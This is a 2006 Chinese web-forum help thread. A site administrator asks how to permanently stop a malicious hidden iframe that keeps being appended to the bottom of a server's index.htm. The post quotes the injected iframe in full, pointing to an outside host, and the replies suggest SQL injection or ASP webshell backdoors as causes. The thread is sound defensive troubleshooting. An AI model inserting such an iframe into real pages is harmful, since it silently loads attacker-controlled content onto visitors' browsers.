用户
 找回密码
 立即注册
搜索

[求助] 网站页面被嵌入恶意代码,有谁知道应该怎么根治?

[复制链接]

18

主题

191

帖子

64

积分

注册会员

Rank: 2

积分
64
QQ
发表于 2006-6-8 15:39:00
网站页面被嵌入恶意代码,有谁知道应该怎么根治?
服务器是2003,杀毒软件是卡吧服务器版,发现首页的index.htm经常在底部被嵌入一串恶意代码:

<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://webshell.cardb.cn/hinet.htm" name="loginf"></iframe>

每次删了过几天又有了~全盘杀毒也没发现有什么病毒,请问大家遇到过吗?怎么处理的?
使用道具 举报 回复
发表于 2006-6-8 15:48:00
网页有漏洞  或是服务器有漏洞
使用道具 举报 回复 支持 反对
发表于 2006-6-8 15:58:00
刚才搜了一些这窜代码,发现网上中招的页面还挺多,应该是个比较典型的病毒或漏洞吧?
使用道具 举报 回复 支持 反对
发表于 2006-6-8 16:22:00
SQL注入
使用道具 举报 回复 支持 反对
发表于 2006-6-8 16:29:00
是烦  我也中过...
使用道具 举报 回复 支持 反对
发表于 2006-6-8 17:02:00
提示: 作者被禁止或删除 内容自动屏蔽
使用道具 举报 回复 支持 反对
发表于 2006-6-8 17:46:00
服务器里有后门 或者网页目录中有后门 服务器支持ASP或者PHP吧 请多多注意C/S型的后门 插入很简单 比较难找
你可以在设置服务器用户读写权限 然后在查找木马 修补服务器漏洞 和常见的SQL注射 并注意降低到DBOWENER权限 可以防止SA权限帐户直接造成服务器的破坏
比较常见的有海洋 老兵 浪子 还有Saiy写的一些网页木马 一般加密后就不杀了 楼主用工具在网页目录搜索下关键字吧
使用道具 举报 回复 支持 反对
发表于 2006-6-8 17:48:00
这个小工具可能会帮你点忙
使用道具 举报 回复 支持 反对
发表于 2006-6-8 22:54:00
原帖由 shzxxx 于 2006-6-8 17:46 发表
服务器里有后门 或者网页目录中有后门 服务器支持ASP或者PHP吧 请多多注意C/S型的后门 插入很简单 比较难找
你可以在设置服务器用户读写权限 然后在查找木马 修补服务器漏洞 和常见的SQL注射 并注意降低到DBOWEN ...
那些木马我研究过,能做的权限很大,运行cmd都可以,但那些ASP木马好像没有把服务器的htm文件都嵌入那串代码的功能,我怀疑是不是某种病毒自动搜索并攻击有漏洞的服务器,添加代码的
使用道具 举报 回复 支持 反对
发表于 2006-6-9 08:26:00
有知道真正问题的吗?现在不知道改怎么预防,服务器上asp的站点很多,不可能都去检查代码
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则